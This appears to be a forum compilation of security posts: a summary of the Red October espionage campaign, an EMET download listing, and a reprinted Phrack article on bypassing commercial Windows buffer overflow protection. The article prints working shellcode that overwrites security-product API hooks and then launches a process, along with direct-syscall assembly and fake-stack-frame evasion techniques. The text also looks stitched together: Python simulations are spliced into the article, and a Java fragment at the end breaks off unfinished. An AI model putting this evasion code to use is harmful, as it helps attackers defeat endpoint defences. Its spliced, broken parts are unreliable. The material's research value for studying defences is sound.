The main purpose of the spying modules is to steal information. This includes files from different cryptographic systems, such as «Acid Cryptofiler» (see https://fr.wikipedia.org/wiki/Acid_Cryptofiler), which is known to be used in organizations of the European Union/European Parliament/European Commission since the summer of 2011. All gathered information is packed, encrypted and only then transferred to the C&C server.

Step-by-step description (1st stage)

During our investigation we couldn’t find any e-mails used in the attacks, only top level dropper documents. Nevertheless, based on indirect evidence, we know that the e-mails were sent using one of the following methods:
- Using an anonymous mailbox from a free public email service provider
- Using mailboxes from already infected organizations

E-mail subject lines as well as the text in e-mail bodies varied depending on the target (recipient). The attached file contained the exploit code which activated a Trojan dropper in the system. We have observed the use of at least three different exploits for previously known vulnerabilities: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) and CVE-2012-0158 (MS Word). 
The first attacks that used the exploit for MS Excel started in 2010, while attacks targeting the MS Word vulnerabilities appeared in the summer of 2012. As a notable fact, the attackers used exploit code that was made public and originally came from a previously known targeted attack campaign with Chinese origins. The only thing that was changed was the executable embedded in the document; the attackers replaced it with their own code.

Full article: http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation
Part II: http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies
  3. Enhanced Mitigation Experience Toolkit v3.5 Tech Preview

A toolkit for deploying and configuring security mitigation technologies

[TABLE=class: properties]
[TR]
[TD=class: col1]Version:[/TD]
[TD=class: col2]3.5 Tech Preview[/TD]
[TD=class: col3]Date published:[/TD]
[TD=class: col4]7/25/2012[/TD]
[/TR]
[TR]
[TD=class: col1]Language:[/TD]
[TD=class: col234, colspan: 3] English[/TD]
[/TR]
[/TABLE]
[TABLE=class: articles]
[TR]
[TD=class: col1]KB articles:[/TD]
[TD=class: col234]KB2458544[/TD]
[/TR]
[/TABLE]
[TABLE=class: files]
[TR]
[TH]File name[/TH]
[TH]Size[/TH]
[/TR]
[TR]
[TD=class: file-name]EMET Setup.msi[/TD]
[TD=class: size]6.3 MB[/TD]
[/TR]
[/TABLE]

Download: http://www.microsoft.com/en-us/download/details.aspx?id=30424
Info: The Enhanced Mitigation Experience Toolkit
Technical details: EMET 3.5 Tech Preview leverages security mitigations from the BlueHat Prize - Security Research & Defense - Site Home - TechNet Blogs
-----------------------------------------------------
I have the following in my list of protected applications:
- Flash Player (+ plugin container)
- Java
- Yahoo! Messenger
- Firefox, Chrome, Opera, Internet Explorer
- Adobe Reader
- Word, Excel, PowerPoint, Outlook
- VLC, Winamp
+ Others

Edit: Don't use it for Yahoo! Messenger (at least not with all options enabled), it won't start.
  4. Bypassing 3rd Party Windows Buffer Overflow Protection

==Phrack Inc.==

Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=|
|=-----------------------------------------------------------------------=|
|=--------------=[ anonymous <p62_wbo_a@author.phrack.org> ]=------------=|
|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=|
|=--------------=[ anonymous <p62_wbo_b@author.phrack.org> ]=------------=|

--[ Contents

1 - Introduction
2 - Stack Backtracing
3 - Evading Kernel Hooks
  3.1 - Kernel Stack Backtracing
  3.2 - Faking Stack Frames
4 - Evading Userland Hooks
  4.1 - Implementation Problems - Incomplete API Hooking
    4.1.1 - Not Hooking all API Versions
    4.1.2 - Not Hooking Deeply Enough
    4.1.3 - Not Hooking Thoroughly Enough
  4.2 - Fun With Trampolines
    4.2.1 - Patch Table Jumping
    4.2.2 - Hook Hopping
  4.3 - Repatching Win32 APIs
  4.4 - Attacking Userland Components
    4.4.1 - IAT Patching
    4.4.2 - Data Section Patching
  4.5 - Calling Syscalls Directly
  4.6 - Faking Stack Frames
5 - Conclusions

--[ 1 - Introduction

Recently, a number of commercial security systems started to offer protection against buffer overflows. This paper analyzes the protection claims and describes several techniques to bypass the buffer overflow protection. Existing commercial systems implement a number of techniques to protect against buffer overflows. Currently, stack backtracing is the most popular one. It is also the easiest to implement and the easiest to bypass. Several commercial products such as Entercept (now NAI Entercept) and Okena (now Cisco Security Agent) implement this technique.

--[ 2 - Stack Backtracing

Most of the existing commercial security systems do not actually prevent buffer overflows but rather attempt to detect the execution of shellcode. 
The most common technology used to detect shellcode is code page permission checking, which involves checking whether code is executing on a writable page of memory. This is necessary since architectures such as x86 do not support the non-executable memory bit. Some systems also perform additional checking to see whether the code's page of memory belongs to a memory mapped file section and not to an anonymous memory section.

[-----------------------------------------------------------]
page = get_page_from_addr( code_addr );
if (page->permissions & WRITABLE)
    return BUFFER_OVERFLOW;
ret = page_originates_from_file( page );
if (ret != TRUE)
    return BUFFER_OVERFLOW;
[-----------------------------------------------------------]
Pseudo code for code page permission checking

Buffer overflow protection technologies (BOPT) that rely on stack backtracing don't actually create non-executable heap and stack segments. Instead they hook the OS and check for shellcode execution during the hooked API calls. Most operating systems can be hooked in userland or in the kernel. The next section deals with evading kernel hooks, while section 4 deals with bypassing userland hooks.

--[ 3 - Evading Kernel Hooks

When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must be able to detect where a userland API call originated. Due to the heavy use of the kernel32.dll and ntdll.dll libraries, an API call is usually several stack frames away from the actual syscall trap call. For this reason, some intrusion prevention systems rely on using stack backtracing to locate the original caller of a system call.

----[ 3.1 - Kernel Stack Backtracing

While stack backtracing can occur from either userland or kernel, it is far more important for the kernel components of a BOPT than for its userland components. The kernel components of existing commercial BOPTs rely entirely on stack backtracing to detect shellcode execution. 
Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests described above. Frequently, there is also an additional "return into libc" check, which involves checking that a return address points to an instruction immediately following a call or a jump. The basic operation of stack backtracing code, as used by a BOPT, is presented below. [-----------------------------------------------------------] while (is_valid_frame_pointer( ebp )) { ret_addr = get_ret_addr( ebp ); if (check_code_page(ret_addr) == BUFFER_OVERFLOW) return BUFFER_OVERFLOW; if (does_not_follow_call_or_jmp_opcode(ret_addr)) return BUFFER_OVERFLOW; ebp = get_next_frame( ebp ); } [-----------------------------------------------------------] Pseudo code for BOPT stack backtracing When discussing how to evade stack backtracing, it is important to understand how stack backtracing works on an x86 architecture. A typical stack frame looks as follows during a function call: : : |-------------------------| | function B parameter #2 | |-------------------------| | function B parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |=========================| | function A parameter #2 | |-------------------------| | function A parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |-------------------------| : : The EBP register points to the next stack frame. Without the EBP register it is very hard, if not impossible, to correctly identify and trace through all the stack frames. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead. 
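The backtracing loop shown in the pseudo code above can be modeled with a small simulation. This is purely illustrative: the "stack" is a hand-built table rather than real memory, and all addresses are invented.

```python
# Toy model of EBP-chain backtracing (illustrative only; not real memory).
# Each entry maps a frame's EBP to (saved EBP of next frame, return address).
WRITABLE_PAGES = [(0x7FFF0000, 0x7FFFFFFF)]      # pretend stack region

frames = {
    0x7FFF1000: (0x7FFF1040, 0x00401234),        # return into code: fine
    0x7FFF1040: (0x7FFF1080, 0x00405678),        # return into code: fine
    0x7FFF1080: (0x00000000, 0x7FFF2000),        # return into stack: shellcode!
}

def is_writable(addr):
    return any(lo <= addr <= hi for lo, hi in WRITABLE_PAGES)

def backtrace(ebp):
    while ebp in frames:                         # is_valid_frame_pointer()
        ebp, ret_addr = frames[ebp]
        if is_writable(ret_addr):                # check_code_page()
            return "BUFFER_OVERFLOW"
    return "OK"

assert backtrace(0x7FFF1000) == "BUFFER_OVERFLOW"

# An attacker who terminates the chain early with a fake final frame
# holding a clean return address (section 3.2) is never caught:
frames[0x7FFF1080] = (0x00000000, 0x0040AAAA)
assert backtrace(0x7FFF1000) == "OK"
```

The last two lines mirror the evasion described in this paper: the detector can only inspect what the attacker-controlled frame chain lets it reach.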
With an EBP optimization, a stack frame looks as follows during a function call:

|-----------------------|
| function parameter #2 |
|-----------------------|
| function parameter #1 |
|-----------------------|
| return EIP address |
|-----------------------|

Notice that the EBP register is not present on the stack. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. This makes their task incredibly hard as a simple return into libc style attack will bypass the protection. Simply originating an API call one layer higher than the BOPT hook defeats the detection technique.

----[ 3.2 - Faking Stack Frames

Since the stack is under complete control of the shellcode, it is possible to completely alter its contents prior to an API call. Specially crafted stack frames can be used to bypass the buffer overflow detectors. As was explained previously, the buffer overflow detector is looking for three key indicators of legitimate code: read-only page permissions, memory mapped file section and a return address pointing to an instruction immediately following a call or jmp. Since function pointers change calling semantics, BOPTs do not (and cannot) check that a call or jmp actually points to the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot stack backtrace any further). Evading a BOPT is therefore simply a matter of creating a "final" stack frame which has a valid return address. This valid return address must point to an instruction residing in a read-only memory mapped file section and immediately following a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control. 
The ideal instruction sequence to point the dummy return address to is:

[-----------------------------------------------------------]
jmp [eax] ; or call [eax], or another register
dummy_return:
... ; some number of nops or easily
    ; reversed instructions, e.g. inc eax
ret ; any return will do, e.g. ret 8
[-----------------------------------------------------------]

Bypassing kernel BOPT components is easy because they must rely on user controlled data (the stack) to determine the validity of an API call. By correctly manipulating the stack, it is possible to prematurely terminate the stack return address analysis. This stack backtracing evasion technique is also effective against userland hooks (see section 4.6).

--[ 4 - Evading Userland Hooks

Given the presence of the correct instruction sequence in a valid region of memory, it is possible to trivially bypass kernel buffer overflow protection techniques. Similar techniques can be used to bypass userland BOPT components. In addition, since the shellcode executes with the same permissions as the userland hooks, a number of other techniques can be used to evade the detection.

----[ 4.1 - Implementation Problems - Incomplete API Hooking

There are many problems with the userland based buffer overflow protection technologies. For example, they require the buffer overflow protection code to be in the code path of all of the attacker's calls or the shellcode execution will go undetected. Trying to determine what an attacker will do with his or her shellcode a priori is an extremely hard problem, if not an impossible one. Getting on the right path is not easy. Some of the obstacles in the way include:

a. Not accounting for both UNICODE and ANSI versions of a Win32 API call.
b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are nothing more than wrappers for other functions within kernel32.dll or ntdll.dll.
c. The constantly changing nature of the Microsoft Windows API. 
--------[ 4.1.1 - Not Hooking All API Versions

A commonly encountered mistake with userland API hooking implementations is incomplete code path coverage. In order for API interception based products to be effective, all APIs utilized by attackers must be hooked. This requires the buffer overflow protection technology to hook somewhere along the code path an attacker _has_ to take. However, as will be shown, once an attacker has begun executing code, it becomes very difficult for third party systems to cover all code paths. Indeed, no tested commercial buffer overflow detector actually provided effective code path coverage. Many Windows API functions have two versions: ANSI and UNICODE. The ANSI function names usually end in A, and UNICODE functions end in W because of their wide character nature. The ANSI functions are often nothing more than wrappers that call the UNICODE version of the API. For example, CreateFileA takes the ANSI file name that was passed as a parameter and turns it into an UNICODE string. It then calls CreateFileW. Unless a vendor hooks both the UNICODE and ANSI version of the API function, an attacker can bypass the protection mechanism by simply calling the other version of the function. For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt to intercept LoadLibraryW. If a protection mechanism was only going to hook one version of a function, it would make more sense to hook the UNICODE version. For this particular function, Okena/CSA does a better job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW. Unfortunately for the third party buffer overflow detectors, simply hooking more functions in kernel32.dll is not enough.

--------[ 4.1.2 - Not Hooking Deeply Enough

In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many buffer overflow detection products do not hook functions within ntdll.dll. 
This simple error is similar to not hooking both the UNICODE and ANSI versions of a function. An attacker can simply call ntdll.dll directly and completely bypass all the kernel32.dll "checkpoints" established by a buffer overflow detector. For example, NAI Entercept tries to detect shellcode calling GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the same goal, and at the same time never pass through the NAI Entercept hook. Similarly, shellcode can bypass userland hooks altogether and make system calls directly (see section 4.5).

--------[ 4.1.3 - Not Hooking Thoroughly Enough

The interactions between the various Win32 API functions are byzantine, complex and difficult to understand. A vendor needs to make only one mistake in order to create a window of opportunity for an attacker. For example, Okena/CSA and NAI Entercept both hook WinExec trying to prevent attacker's shellcode from spawning a process. The call path for WinExec looks like this:

WinExec() --> CreateProcessA() --> CreateProcessInternalA()

Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() (see Appendix A and B). However, neither product hooks CreateProcessInternalA() (exported by kernel32.dll). When writing a shellcode, an attacker could find the export for CreateProcessInternalA() and use it instead of calling WinExec(). CreateProcessA() pushes two NULLs onto the stack before calling CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs and then call CreateProcessInternalA() directly to evade the userland API hooks of both products. As new DLLs and APIs are released, the complexity of Win32 API internal interactions increases, making the problem worse. Third party product vendors are at a severe disadvantage when implementing their buffer overflow detection technologies and are bound to make mistakes which can be exploited by attackers. 
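The incomplete-coverage problem can be reduced to a toy model (Python, purely illustrative; all names are invented stand-ins for the Win32 call chain): a monitor that wraps only the outer APIs never sees a call made to the deep, unhooked function.

```python
# Toy model of incomplete API hooking (illustrative only; not Windows code).
calls_seen_by_hook = []

def create_process_internal(cmd):      # deep function, left unhooked
    return f"spawned {cmd}"

def create_process(cmd):               # wrapper, like CreateProcessA
    return create_process_internal(cmd)

def win_exec(cmd):                     # outer wrapper, like WinExec
    return create_process(cmd)

def hook(func):
    """Record the call, then pass through to the real function."""
    def wrapper(cmd):
        calls_seen_by_hook.append(func.__name__)
        return func(cmd)
    return wrapper

# The "BOPT" hooks only the outer wrappers...
win_exec = hook(win_exec)
create_process = hook(create_process)

# ...but an attacker who resolves the deep export calls it directly:
result = create_process_internal("calc.exe")
assert result == "spawned calc.exe"
assert calls_seen_by_hook == []        # the hooks never saw the call
```

A legitimate call through win_exec() would be logged twice (once per hook), which is exactly why the direct call to the inner function stays invisible: the detector is simply not on that code path.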
----[ 4.2 - Fun With Trampolines Most Win32 API functions begin with a five byte preamble. First, EBP is pushed onto the stack, then ESP is moved into EBP. [-----------------------------------------------------------] Code Bytes Assembly 55 push ebp 8bec mov ebp, esp [-----------------------------------------------------------] Both Okena/CSA and Entercept use inline function hooking. They overwrite the first 5 bytes of a function with an immediate unconditional jump or call. For example, this is what the first few bytes of WinExec() look like after NAI Entercept's hooks have been installed: [-----------------------------------------------------------] Code Bytes Assembly e8 xx xx xx xx call xxxxxxxx 54 push esp 53 push ebx 56 push esi 57 push edi [-----------------------------------------------------------] Alternatively, the first few bytes could be overwritten with a jump instruction: [-----------------------------------------------------------] Code Bytes Assembly e9 xx xx xx xx jmp xxxxxxxx ... [-----------------------------------------------------------] Obviously, it is easy for shellcode to test for these and other signatures before calling a function. If a hijacking mechanism is detected, the shellcode can use several different techniques to bypass the hook. ------[ 4.2.1 - Patch Table Jumping When an API is hooked, the original preamble is saved into a table so that the buffer overflow detector can recreate the original API after performing its validation checks. The preamble is stored in a patch table, which resides somewhere in the address space of an application. When shellcode detects the presence of an API hook, it can simply search for the patch table and make its calls to patch table entries. This completely avoids the hook, preventing the userland buffer overflow detector components from ever being in the attacker's call path. 
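The opcode signature test described in this section can be sketched as follows. This is a simplified illustration operating on a byte string rather than live memory: it checks whether a function preamble has been replaced by an immediate call (0xE8) or jmp (0xE9) and, if so, decodes the rel32 operand to recover where the detour leads.

```python
import struct

NORMAL_PREAMBLE = bytes([0x55, 0x8B, 0xEC])   # push ebp / mov ebp, esp

def find_hook_target(func_addr, code):
    """If the function starts with an immediate call (0xE8) or jmp (0xE9),
    decode the little-endian rel32 operand and return the absolute address
    the hook transfers to; otherwise return None (no inline hook seen)."""
    if code[0] in (0xE8, 0xE9):
        rel32 = struct.unpack_from("<i", code, 1)[0]
        # rel32 is relative to the end of the 5-byte instruction.
        return (func_addr + 5 + rel32) & 0xFFFFFFFF
    return None

# A clean WinExec-style preamble is left alone (addresses invented):
assert find_hook_target(0x7C860000, NORMAL_PREAMBLE + b"\x83\xec\x54") is None

# A hooked preamble reveals the detour address, which the shellcode
# could then avoid, hop over, or overwrite:
hooked = b"\xe9" + struct.pack("<i", 0x1000) + b"\x54\x53"
assert find_hook_target(0x7C860000, hooked) == 0x7C860000 + 5 + 0x1000
```

Real shellcode would do the same comparison on the first bytes of the API in memory before deciding whether to call it, hop past the hook, or restore the original preamble.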
------[ 4.2.2 - Hook Hopping Alternatively, instead of locating the patch table, shellcode can include its own copy of the original pre-hook preamble. After executing its own API preamble, the shellcode can transfer execution to immediately after the API hook (function address plus five bytes). Since Intel x86 has variable length instructions, one must take this into account in order to land on an even instruction boundary: [-----------------------------------------------------------] Shellcode: call WinExecPreamble WinExecPreamble: push ebp mov ebp, esp sub esp, 54 jmp WinExec+6 [-----------------------------------------------------------] This technique will not work if another function within the call path is also hooked. In this case, Entercept also hooks CreateProcessA(), which WinExec() calls. Thus, to evade detection shellcode should call CreateProcessA() using the stored copy of CreateProcessA's preamble. ----[ 4.3 - Repatching Win32 APIs Thoroughly hooking Win32 APIs is not effective when certain fundamental errors are made in the implementation of a userland buffer overflow detection component. Certain implementations (NAI Entercept) have a serious problem with the way they perform their API hooking. In order to be able to overwrite preambles of hooked functions, the code section for a DLL has to be made writable. Entercept marks code sections of kernel32.dll and ntdll.dll as writable in order to be able to modify their contents. However, Entercept never resets the writable bit! Due to this serious security flaw, it is possible for an attacker to overwrite the API hook by re-injecting the original preamble code. For the WinExec() and CreateProcessA() examples, this would require overwriting the first 6 bytes (just to be instruction aligned) of WinExec() and CreateProcessA() with the original preamble. 
[-----------------------------------------------------------]
WinExecOverWrite:
Code Bytes      Assembly
55              push ebp
8bec            mov ebp, esp
83ec54          sub esp, 54

CreateProcessAOverWrite:
Code Bytes      Assembly
55              push ebp
8bec            mov ebp, esp
ff752c          push DWORD PTR [ebp+2c]
[-----------------------------------------------------------]

This technique will not work against properly implemented buffer overflow detectors, however it is very effective against NAI Entercept. A complete shellcode example which overwrites the NAI Entercept hooks is presented below:

[-----------------------------------------------------------]
// This sample code overwrites the preamble of WinExec and
// CreateProcessA to avoid detection. The code then
// calls WinExec with a "calc.exe" parameter.
// The code demonstrates that by overwriting function
// preambles, it is able to evade Entercept and Okena/CSA
// buffer overflow protection.
_asm {
    pusha
    jmp JUMPSTART
START:
    pop ebp
    xor eax, eax
    mov al, 0x30
    mov eax, fs:[eax];
    mov eax, [eax+0xc];
    // We now have the module_item for ntdll.dll
    mov eax, [eax+0x1c]
    // We now have the module_item for kernel32.dll
    mov eax, [eax]
    // Image base of kernel32.dll
    mov eax, [eax+0x8]
    movzx ebx, word ptr [eax+3ch]
    // pe.oheader.directorydata[EXPORT=0]
    mov esi, [eax+ebx+78h]
    lea esi, [eax+esi+18h]
    // EBX now has the base module address
    mov ebx, eax
    lodsd
    // ECX now has the number of function names
    mov ecx, eax
    lodsd
    add eax, ebx
    // EDX has addresses of functions
    mov edx, eax
    lodsd
    // EAX has address of names
    add eax, ebx
    // Save off the number of named functions for later
    push ecx
    // Save off the address of the functions
    push edx
RESETEXPORTNAMETABLE:
    xor edx, edx
INITSTRINGTABLE:
    mov esi, ebp        // Beginning of string table
    inc esi
MOVETHROUGHTABLE:
    mov edi, [eax+edx*4]
    add edi, ebx        // EBX has the process base address
    xor ecx, ecx
    mov cl, BYTE PTR [ebp]
    test cl, cl
    jz DONESTRINGSEARCH
STRINGSEARCH:
    // ESI points to the function string table
    repe cmpsb
    je Found
    // The number of named functions is on the stack
    cmp [esp+4], edx
    je NOTFOUND
    inc edx
    jmp INITSTRINGTABLE
Found:
    pop ecx
    shl edx, 2
    add edx, ecx
    mov edi, [edx]
    add edi, ebx
    push edi
    push ecx
    xor ecx, ecx
    mov cl, BYTE PTR [ebp]
    inc ecx
    add ebp, ecx
    jmp RESETEXPORTNAMETABLE
DONESTRINGSEARCH:
OverWriteCreateProcessA:
    pop edi
    pop edi
    push 0x06
    pop ecx
    inc esi
    rep movsb
OverWriteWinExec:
    pop edi
    push edi
    push 0x06
    pop ecx
    inc esi
    rep movsb
CallWinExec:
    push 0x03
    push esi
    call [esp+8]
NOTFOUND:
    pop edx
STRINGEXIT:
    pop ecx
    popa;
    jmp EXIT
JUMPSTART:
    add esp, 0x1000
    call START
WINEXEC:
    _emit 0x07
    _emit 'W'
    _emit 'i'
    _emit 'n'
    _emit 'E'
    _emit 'x'
    _emit 'e'
    _emit 'c'
CREATEPROCESSA:
    _emit 0x0e
    _emit 'C'
    _emit 'r'
    _emit 'e'
    _emit 'a'
    _emit 't'
    _emit 'e'
    _emit 'P'
    _emit 'r'
    _emit 'o'
    _emit 'c'
    _emit 'e'
    _emit 's'
    _emit 's'
    _emit 'A'
ENDOFTABLE:
    _emit 0x00
WinExecOverWrite:
    _emit 0x06
    _emit 0x55
    _emit 0x8b
    _emit 0xec
    _emit 0x83
    _emit 0xec
    _emit 0x54
CreateProcessAOverWrite:
    _emit 0x06
    _emit 0x55
    _emit 0x8b
    _emit 0xec
    _emit 0xff
    _emit 0x75
    _emit 0x2c
COMMAND:
    _emit 'c'
    _emit 'a'
    _emit 'l'
    _emit 'c'
    _emit '.'
    _emit 'e'
    _emit 'x'
    _emit 'e'
    _emit 0x00
EXIT:
    _emit 0x90          // Normally call ExitThread or something here
    _emit 0x90
}
[-----------------------------------------------------------]

----[ 4.4 - Attacking Userland Components

While evading the hooks and techniques used by userland buffer overflow detector components is effective, there exist other mechanisms of bypassing the detection. Because both the shellcode and the buffer overflow detector are executing with the same privileges and in the same address space, it is possible for shellcode to directly attack the buffer overflow detector's userland component. Essentially, when attacking the buffer overflow detector userland component, the attacker is attempting to subvert the mechanism used to perform the shellcode detection check. There are only two principal techniques for shellcode validation checking. 
Either the data used for the check is determined dynamically during each hooked API call, or the data is gathered at process start up and then checked during each call. In either case, it is possible for an attacker to subvert the process.

------[ 4.4.1 - IAT Patching

Rather than implementing their own versions of memory page information functions, the commercial buffer overflow protection products simply use the operating system APIs. In Windows NT, these are implemented in ntdll.dll. These APIs will be imported into the userland component (itself a DLL) via its PE Import Table. An attacker can patch vectors within the import table to alter the location of an API to a function supplied by the shellcode. By supplying the function used to do the validation checking by the buffer overflow detector, it is trivial for an attacker to evade detection.

------[ 4.4.2 - Data Section Patching

For various reasons, a buffer overflow detector might use a pre-built list of page permissions within the address space. When this is the case, altering the address of the VirtualQuery() API is not effective. To subvert the buffer overflow detector, the shellcode has to locate and modify the data table used by the return address validation routines. This is a fairly straightforward, although application specific, technique for subverting buffer overflow prevention technologies.

----[ 4.5 - Calling Syscalls Directly

As mentioned above, rather than using ntdll.dll APIs to make system calls, it is possible for an attacker to create shellcode which makes system calls directly. While this technique is very effective against userland components, it obviously cannot be used to bypass kernel based buffer overflow detectors. To take advantage of this technique you must understand what parameters a kernel function uses. These may not always be the same as the parameters required by the kernel32 or ntdll API versions. Also, you must know the system call number of the function in question. 
You can find this dynamically using a technique similar to the one to find function addresses. Once you have the address of the ntdll.dll version of the function you want to call, index into the function one byte and read the following DWORD. This is the system call number in the system call table for the function. This is a common trick used by rootkit developers. Here is the pseudo code for calling the NtReadFile system call directly:

...
xor eax, eax
// Optional Key
push eax
// Optional pointer to large integer with the file offset
push eax
push Length_of_Buffer
push Address_of_Buffer
// Before call make room for two DWORDs called the IoStatusBlock
push Address_of_IoStatusBlock
// Optional ApcContext
push eax
// Optional ApcRoutine
push eax
// Optional Event
push eax
// Required file handle
push hFile
// EAX must contain the system call number
mov eax, Found_Sys_Call_Num
// EDX needs the address of the userland stack
lea edx, [esp]
// Trap into the kernel
// (recent Windows NT versions use "sysenter" instead)
int 2e

----[ 4.6 - Faking Stack Frames

As described in section 3.2, kernel based stack backtracing can be bypassed using fake frames. The same technique works against userland based detectors. To bypass both userland and kernel backtracing, shellcode can create a fake stack frame without the ebp register on stack. Since stack backtracing relies on the presence of the ebp register to find the next stack frame, fake frames can stop backtracing code from tracing past the fake frame. Of course, generating a fake stack frame is not going to work when the EIP register still points to shellcode which resides in a writable memory segment. To bypass the protection code, shellcode needs to use an address that lies in a non-writable memory segment. This presents a problem since shellcode needs a way to eventually regain control of the execution. 
The trick to regaining control is to proxy the return to shellcode through a "ret" instruction which resides in a non-writable memory segment. A "ret" instruction can be found dynamically by searching memory for a 0xC3 opcode.

Here is an illustration of a normal LoadLibrary("kernel32.dll") call that originates from a writable memory segment:

push kernel32_string
call LoadLibrary
return_eip:
.
.
.
LoadLibrary:    ; * see below for a stack illustration
.
.
.
ret             ; return to stack-based return_eip

|------------------------------|
| address of "kernel32.dll" str|
|------------------------------|
| return address (return_eip)  |
|------------------------------|

As explained before, the buffer overflow protection code executes before LoadLibrary gets to run. Since the return address (return_eip) is in a writable memory segment, the protection code logs the overflow and terminates the process.

The next example illustrates the 'proxy through a "ret" instruction' technique:

push return_eip
push kernel32_string
; fake "call LoadLibrary" call
push address_of_ret_instruction
jmp LoadLibrary
return_eip:
.
.
.
LoadLibrary:    ; * see below for a stack illustration
.
.
.
ret             ; return to non stack-based address_of_ret_instruction

address_of_ret_instruction:
.
.
.
ret             ; return to stack-based return_eip

Once again, the buffer overflow protection code executes before LoadLibrary gets to run. This time though, the stack is set up with a return address pointing to a non-writable memory segment. In addition, the ebp register is not present on the stack, thus the protection code cannot perform stack backtracing and determine that the return address in the next stack frame points to a writable segment. This allows the shellcode to call LoadLibrary, which returns to the "ret" instruction. In its turn, the "ret" instruction pops the next return address off the stack (return_eip) and transfers control to it.
|------------------------------|
| return address (return_eip)  |
|------------------------------|
| address of "kernel32.dll" str|
|------------------------------|
| address of "ret" instruction |
|------------------------------|

In addition, any number of arbitrarily complex fake stack frames can be set up to further confuse the protection code. Here is an example of a fake frame that uses a "ret 8" instruction instead of a simple "ret":

|--------------------------------|
| return address                 |
|--------------------------------|
| address of "ret" instruction   | <- fake frame 2
|--------------------------------|
| any value                      |
|--------------------------------|
| address of "kernel32.dll" str  |
|--------------------------------|
| address of "ret 8" instruction | <- fake frame 1
|--------------------------------|

This causes an extra 32-bit value to be removed from the stack, complicating any kind of analysis even further.

--[ 5 - Conclusions

The majority of commercial security systems do not actually prevent buffer overflows but rather detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking, which relies on stack backtracing. Stack backtracing involves traversing stack frames and verifying that the return addresses do not originate from writable memory segments such as stack or heap areas.

The paper presents a number of different ways to bypass both userland and kernel based stack backtracing. These range from tampering with function preambles to creating fake stack frames. In conclusion, the majority of current buffer overflow protection implementations are flawed, providing a false sense of security and little real protection against determined attackers.

Appendix A: Entercept 4.1 Hooks

Entercept hooks a number of functions in userland and in the kernel. Here is a list of the currently hooked functions as of Entercept 4.1.
User Land

msvcrt.dll
    _creat
    _read
    _write
    system

kernel32.dll
    CreatePipe
    CreateProcessA
    GetProcAddress
    GetStartupInfoA
    LoadLibraryA
    PeekNamedPipe
    ReadFile
    VirtualProtect
    VirtualProtectEx
    WinExec
    WriteFile

advapi32.dll
    RegOpenKeyA

rpcrt4.dll
    NdrServerInitializeMarshall

user32.dll
    ExitWindowsEx

ws2_32.dll
    WPUCompleteOverlappedRequest
    WSAAddressToStringA
    WSACancelAsyncRequest
    WSACloseEvent
    WSAConnect
    WSACreateEvent
    WSADuplicateSocketA
    WSAEnumNetworkEvents
    WSAEventSelect
    WSAGetServiceClassInfoA
    WSCInstallNameSpace

wininet.dll
    InternetSecurityProtocolToStringW
    InternetSetCookieA
    InternetSetOptionExA

lsasrv.dll
    LsarLookupNames
    LsarLookupSids2

msv1_0.dll
    Msv1_0ExportSubAuthenticationRoutine
    Msv1_0SubAuthenticationPresent

Kernel
    NtConnectPort
    NtCreateProcess
    NtCreateThread
    NtCreateToken
    NtCreateKey
    NtDeleteKey
    NtDeleteValueKey
    NtEnumerateKey
    NtEnumerateValueKey
    NtLoadKey
    NtLoadKey2
    NtQueryKey
    NtQueryMultipleValueKey
    NtQueryValueKey
    NtReplaceKey
    NtRestoreKey
    NtSetValueKey
    NtMakeTemporaryObject
    NtSetContextThread
    NtSetInformationProcess
    NtSetSecurityObject
    NtTerminateProcess

Appendix B: Okena/Cisco CSA 3.2 Hooks

Okena/CSA hooks many functions in userland but far fewer in the kernel. A lot of the userland hooks are the same ones that Entercept hooks. However, almost all of the functions Okena/CSA hooks in the kernel are related to altering keys in the Windows registry. Okena/CSA does not seem as concerned as Entercept about backtracing calls in the kernel. This leads to an interesting vulnerability, left as an exercise to the reader.
User Land

kernel32.dll
    CreateProcessA
    CreateProcessW
    CreateRemoteThread
    CreateThread
    FreeLibrary
    LoadLibraryA
    LoadLibraryExA
    LoadLibraryExW
    LoadLibraryW
    LoadModule
    OpenProcess
    VirtualProtect
    VirtualProtectEx
    WinExec
    WriteProcessMemory

ole32.dll
    CoFileTimeToDosDateTime
    CoGetMalloc
    CoGetStandardMarshal
    CoGetState
    CoResumeClassObjects
    CreateObjrefMoniker
    CreateStreamOnHGlobal
    DllGetClassObject
    StgSetTimes
    StringFromCLSID

oleaut32.dll
    LPSAFEARRAY_UserUnmarshal

urlmon.dll
    CoInstall

Kernel
    NtCreateKey
    NtOpenKey
    NtDeleteKey
    NtDeleteValueKey
    NtSetValueKey
    NtOpenProcess
    NtWriteVirtualMemory

|=[ EOF ]=---------------------------------------------------------------=|

Sursa: .:: Phrack Magazine ::.
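As a footnote to section 4.4.1 of the paper above: the essence of IAT patching is a one-pointer swap in a lookup table, after which the detector unknowingly calls attacker-chosen validation code. The toy Java model below (a map standing in for the import table; the API name, the address range, and the writable-page check are all purely illustrative) shows how the same stack return address goes from rejected to accepted after the swap:

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Predicate;

public class IatPatchModel {
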